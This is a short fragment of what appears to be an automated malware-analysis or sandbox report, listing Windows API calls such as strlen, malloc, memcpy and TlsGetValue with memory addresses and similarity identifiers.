                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C752AF5,?,?,?,?,?,6C750A1B,00000000), ref: 6C7B0F1A
                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C7B0F30
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7B0F42
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7B0F5B
                                                                                                                  Similarity
                                                                                                                  • API ID: Valuemallocmemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2332725481-0